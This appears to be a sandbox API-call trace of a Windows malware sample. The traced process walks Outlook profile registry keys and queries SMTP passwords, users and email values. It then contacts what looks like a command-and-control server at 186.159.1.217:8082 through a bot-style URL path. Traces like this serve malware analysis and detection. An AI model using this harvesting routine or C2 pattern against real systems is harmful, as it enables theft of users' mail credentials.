	[0219.679] RegQueryValueExA (in: hKey=0x158, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x16ef2b8, lpcbData=0x16ef2b4*=0x4 | out: lpType=0x16ef2b0*=0x0, lpData=0x16ef2b8*=0x0, lpcbData=0x16ef2b4*=0x4) returned 0x2
	[0219.679] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x15c) returned 0x0
	[0219.679] RegQueryValueExA (in: hKey=0x15c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x0, lpData=0x0, lpcbData=0x16ef868*=0x0) returned 0x2
	[0219.679] RegCloseKey (hKey=0x15c) returned 0x0
	[0219.679] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x400) returned 0x3a7e88
	[0219.680] RegQueryValueExA (in: hKey=0x140, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x16ef744, lpData=0x3a7e88, lpcbData=0x16ef80c*=0x400 | out: lpType=0x16ef744*=0x0, lpData=0x3a7e88*=0x0, lpcbData=0x16ef80c*=0x400) returned 0x2
	[0219.680] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7e88 | out: hHeap=0x370000) returned 1
	[0219.680] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x15c) returned 0x0
	[0219.680] RegQueryValueExA (in: hKey=0x15c, lpValueName="HTTP Server", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x0, lpData=0x0, lpcbData=0x16ef868*=0x0) returned 0x2
	[0219.680] RegCloseKey (hKey=0x15c) returned 0x0
	[0219.680] RegCloseKey (hKey=0x140) returned 0x0
	[0219.680] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399328 | out: hHeap=0x370000) returned 1
	[0219.680] RegEnumKeyA (in: hKey=0x104, dwIndex=0x3, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x0
	[0219.680] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x399328
	[0219.680] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xbf) returned 0x3993b0
	[0219.680] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399328 | out: hHeap=0x370000) returned 1
	[0219.680] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004", phkResult=0x16ef800 | out: phkResult=0x16ef800*=0x140) returned 0x0
	[0219.680] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x15c) returned 0x0
	[0219.680] RegQueryValueExA (in: hKey=0x15c, lpValueName="Email", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x0, lpData=0x0, lpcbData=0x16ef868*=0x0) returned 0x2
	[0219.680] RegCloseKey (hKey=0x15c) returned 0x0
	[0219.681] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3993b0 | out: hHeap=0x370000) returned 1
	[0219.681] RegEnumKeyA (in: hKey=0x104, dwIndex=0x4, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.681] RegCloseKey (hKey=0x104) returned 0x0
	[0219.681] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.681] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.681] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.681] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.681] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\95a84a5145e1b7428591aa8b63570f22", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.681] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.681] RegCloseKey (hKey=0x104) returned 0x0
	[0219.681] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.681] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.681] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.681] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.681] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\98abf245da169742aaaaf5b0bdd4dea8", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.681] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.681] RegCloseKey (hKey=0x104) returned 0x0
	[0219.681] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.681] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.681] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.681] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.681] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\adf5b6e3c063d3459407b9def7e90514", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.681] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.681] RegCloseKey (hKey=0x104) returned 0x0
	[0219.681] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.681] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.682] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.682] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.682] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.682] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.682] RegCloseKey (hKey=0x104) returned 0x0
	[0219.682] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.682] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.682] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.682] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.682] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\c5d2c4710d70ab4c8917b715c91bcb5a", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.682] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.682] RegCloseKey (hKey=0x104) returned 0x0
	[0219.682] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.682] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.682] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.682] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.682] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\ce1460b2d4cad64e96fa40180c6297a9", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.682] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.682] RegCloseKey (hKey=0x104) returned 0x0
	[0219.682] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.682] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.682] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.682] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.682] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\ddb0922fc50b8d42be5a821ede840761", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.682] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.682] RegCloseKey (hKey=0x104) returned 0x0
	[0219.683] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.683] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.683] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.683] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.683] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.683] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.683] RegCloseKey (hKey=0x104) returned 0x0
	[0219.683] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.683] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.683] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.683] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.683] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\fdd8a1fc7778114da9ed4f04391d9dea", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.683] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000004") returned 0x103
	[0219.683] RegCloseKey (hKey=0x104) returned 0x0
	[0219.683] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.683] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.683] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x90) returned 0x39b720
	[0219.683] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.683] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\{D9734F19-8CFB-411D-BC59-833E334FCB5E}", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.683] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="Calendar Summary") returned 0x0
	[0219.683] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x90) returned 0x399328
	[0219.684] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xd7) returned 0x3993c0
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399328 | out: hHeap=0x370000) returned 1
	[0219.684] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\\Calendar Summary", phkResult=0x16ef800 | out: phkResult=0x16ef800*=0x15c) returned 0x0
	[0219.684] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\\Calendar Summary", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x160) returned 0x0
	[0219.684] RegQueryValueExA (in: hKey=0x160, lpValueName="Email", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x0, lpData=0x0, lpcbData=0x16ef868*=0x0) returned 0x2
	[0219.684] RegCloseKey (hKey=0x160) returned 0x0
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3993c0 | out: hHeap=0x370000) returned 1
	[0219.684] RegEnumKeyA (in: hKey=0x104, dwIndex=0x1, lpName=0x16ef2d8, cchName=0x400 | out: lpName="Calendar Summary") returned 0x103
	[0219.684] RegCloseKey (hKey=0x104) returned 0x0
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a608 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a640 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a6b0 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a678 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a6e8 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a6ff8 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7030 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7068 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a70a0 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a70d8 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7110 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7148 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7180 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a71b8 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a71f0 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7228 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7260 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7298 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a72d0 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7be0 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b650 | out: hHeap=0x370000) returned 1
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a1e0 | out: hHeap=0x370000) returned 1
	[0219.684] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3a1898
	[0219.684] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1960 | out: hHeap=0x370000) returned 1
	[0219.684] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x384ab0
	[0219.684] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390538
	[0219.685] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390538 | out: hHeap=0x370000) returned 1
	[0219.685] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48) returned 0x3863c0
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0219.685] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39a1e0
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3863c0 | out: hHeap=0x370000) returned 1
	[0219.685] memchr (_Buf=0x384ab0, _Val=49, _MaxCount=0x34) returned 0x384aca
	[0219.685] memchr (_Buf=0x384acb, _Val=49, _MaxCount=0x19) returned 0x0
	[0219.685] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x16ef850 | out: phkResult=0x16ef850*=0x0) returned 0x2
	[0219.685] RegCloseKey (hKey=0x0) returned 0x6
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a1e0 | out: hHeap=0x370000) returned 1
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384ab0 | out: hHeap=0x370000) returned 1
	[0219.685] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x384ab0
	[0219.685] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390538
	[0219.685] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390538 | out: hHeap=0x370000) returned 1
	[0219.685] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48) returned 0x3863c0
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a720 | out: hHeap=0x370000) returned 1
	[0219.685] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39a1e0
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3863c0 | out: hHeap=0x370000) returned 1
	[0219.685] memchr (_Buf=0x384ab0, _Val=49, _MaxCount=0x34) returned 0x384aca
	[0219.685] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x16ef850 | out: phkResult=0x16ef850*=0x0) returned 0x2
	[0219.685] RegCloseKey (hKey=0x0) returned 0x6
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a1e0 | out: hHeap=0x370000) returned 1
	[0219.685] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384ab0 | out: hHeap=0x370000) returned 1
	[0219.685] GetProcessHeap () returned 0x370000
	[0219.685] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x39e560
	[0219.685] GetProcessHeap () returned 0x370000
	[0219.686] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390538
	[0219.686] GetProcessHeap () returned 0x370000
	[0219.686] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x12) returned 0x3905b8
	[0219.686] GetProcessHeap () returned 0x370000
	[0219.686] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x100) returned 0x39b650
	[0223.138] GetProcessHeap () returned 0x370000
	[0223.138] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x57) returned 0x3ab448
	[0223.138] wnsprintfA (in: pszDest=0x3ab49b, cchDest=3, pszFmt="%i" | out: pszDest="81") returned 2
	[0223.138] GetProcessHeap () returned 0x370000
	[0223.138] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x39bb88
	[0223.138] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x39bc60
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x39a158
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1d) returned 0x3a1960
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x26) returned 0x39e530
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1960 | out: hHeap=0x370000) returned 1
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x28) returned 0x39e5c0
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x11) returned 0x390618
	[0223.139] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x28) returned 0x39e650
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x13) returned 0x3905f8
	[0223.139] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000
	[0223.139] strstr (_Str="http://186.159.1.217:8082/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/81/", _SubStr="https://") returned 0x0
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48) returned 0x3863c0
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3a1960
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x11) returned 0x3905d8
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x5c) returned 0x3997d8
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.139] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1a) returned 0x3a1b90
	[0223.139] GetProcessHeap () returned 0x370000
	[0223.140] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x49) returned 0x3949b0
	[0223.140] GetProcessHeap () returned 0x370000
	[0223.140] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3997d8 | out: hHeap=0x370000) returned 1
	[0223.140] GetProcessHeap () returned 0x370000
	[0223.140] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3905d8 | out: hHeap=0x370000) returned 1
	[0223.140] GetProcessHeap () returned 0x370000
	[0223.140] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1960 | out: hHeap=0x370000) returned 1
	[0223.140] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.140] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x16ef300 | out: lpWSAData=0x16ef300) returned 0
	[0223.140] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.140] gethostbyname (name="186.159.1.217") returned 0x1776760*(h_name="186.159.1.217", h_aliases=0x1776770*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x1776774*=([0]="186.159.1.217"))
	[0223.140] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.140] socket (af=2, type=1, protocol=0) returned 0x17c
	[0223.141] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.141] connect (s=0x17c, name=0x16ef4a4*(sa_family=2, sin_port=0x1f92, sin_addr="186.159.1.217"), namelen=16) returned 0
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40d) returned 0x3ac838
	[0223.407] GetModuleHandleA (lpModuleName="urlmon.dll") returned 0x76850000
	[0223.407] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x3ac844, cbSize=0x16ef49c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", cbSize=0x16ef49c) returned 0x0
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc4) returned 0x3aafa0
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac838 | out: hHeap=0x370000) returned 1
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac0c8
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3ac0b0
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x12) returned 0x3905d8
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x44) returned 0x386500
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2a) returned 0x38a6b0
	[0223.407] GetProcessHeap () returned 0x370000
	[0223.407] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x59) returned 0x3aab70
	[0223.407] GetProcessHeap () returned 0x370000
